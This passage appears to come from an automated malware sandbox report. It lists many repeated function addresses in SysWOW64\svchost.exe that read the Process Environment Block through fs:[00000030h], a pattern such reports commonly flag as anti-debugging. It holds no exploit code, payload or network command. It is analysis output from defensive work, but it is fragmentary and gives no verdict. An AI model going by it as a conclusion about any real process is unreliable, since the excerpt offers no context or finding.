                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6500 mov eax, dword ptr fs:[00000030h]2_2_037C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037325E0 mov eax, dword ptr fs:[00000030h]2_2_037325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037365D0 mov eax, dword ptr fs:[00000030h]2_2_037365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E59C mov eax, dword ptr fs:[00000030h]2_2_0376E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov eax, dword ptr fs:[00000030h]2_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov ecx, dword ptr fs:[00000030h]2_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764588 mov eax, dword ptr fs:[00000030h]2_2_03764588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC460 mov ecx, dword ptr fs:[00000030h]2_2_037BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372645D mov eax, dword ptr fs:[00000030h]2_2_0372645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375245A mov eax, dword ptr fs:[00000030h]2_2_0375245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A430 mov eax, dword ptr fs:[00000030h]2_2_0376A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C427 mov eax, dword ptr fs:[00000030h]2_2_0372C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037304E5 mov ecx, dword ptr fs:[00000030h]2_2_037304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037644B0 mov ecx, dword ptr fs:[00000030h]2_2_037644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BA4B0 mov eax, dword ptr fs:[00000030h]2_2_037BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037364AB mov eax, dword ptr fs:[00000030h]2_2_037364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372CB7E mov eax, dword ptr fs:[00000030h]2_2_0372CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FAB40 mov eax, dword ptr fs:[00000030h]2_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D8B42 mov eax, dword ptr fs:[00000030h]2_2_037D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EBFC mov eax, dword ptr fs:[00000030h]2_2_0375EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BCBF0 mov eax, dword ptr fs:[00000030h]2_2_037BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEBD0 mov eax, dword ptr fs:[00000030h]2_2_037DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]2_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]2_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804A80 mov eax, dword ptr fs:[00000030h]2_2_03804A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]2_2_037ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]2_2_037ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]2_2_03740A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]2_2_03740A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]2_2_03754A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]2_2_03754A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA38 mov eax, dword ptr fs:[00000030h]2_2_0376CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA24 mov eax, dword ptr fs:[00000030h]2_2_0376CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EA2E mov eax, dword ptr fs:[00000030h]2_2_0375EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BCA11 mov eax, dword ptr fs:[00000030h]2_2_037BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]2_2_0376AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]2_2_0376AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730AD0 mov eax, dword ptr fs:[00000030h]2_2_03730AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]2_2_03764AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]2_2_03764AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]2_2_03738AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]2_2_03738AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786AA4 mov eax, dword ptr fs:[00000030h]2_2_03786AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768A90 mov edx, dword ptr fs:[00000030h]2_2_03768A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]2_2_037D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]2_2_037D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC97C mov eax, dword ptr fs:[00000030h]2_2_037BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov edx, dword ptr fs:[00000030h]2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0946 mov eax, dword ptr fs:[00000030h]2_2_037B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B892A mov eax, dword ptr fs:[00000030h]2_2_037B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C892B mov eax, dword ptr fs:[00000030h]2_2_037C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC912 mov eax, dword ptr fs:[00000030h]2_2_037BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]2_2_03728918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]2_2_03728918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]2_2_037AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]2_2_037AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]2_2_037629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]2_2_037629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE9E0 mov eax, dword ptr fs:[00000030h]2_2_037BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037649D0 mov eax, dword ptr fs:[00000030h]2_2_037649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA9D3 mov eax, dword ptr fs:[00000030h]2_2_037FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C69C0 mov eax, dword ptr fs:[00000030h]2_2_037C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov esi, dword ptr fs:[00000030h]2_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]2_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]2_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]2_2_037309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]2_2_037309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]2_2_037BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]2_2_037BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]2_2_037C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]2_2_037C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760854 mov eax, dword ptr fs:[00000030h]2_2_03760854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]2_2_03734859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]2_2_03734859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03742840 mov ecx, dword ptr fs:[00000030h]2_2_03742840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov ecx, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A830 mov eax, dword ptr fs:[00000030h]2_2_0376A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D483A mov eax, dword ptr fs:[00000030h]2_2_037D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D483A mov eax, dword ptr fs:[00000030h]2_2_037D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC810 mov eax, dword ptr fs:[00000030h]2_2_037BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C8F9 mov eax, dword ptr fs:[00000030h]2_2_0376C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C8F9 mov eax, dword ptr fs:[00000030h]2_2_0376C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA8E4 mov eax, dword ptr fs:[00000030h]2_2_037FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E8C0 mov eax, dword ptr fs:[00000030h]2_2_0375E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC89D mov eax, dword ptr fs:[00000030h]2_2_037BC89D
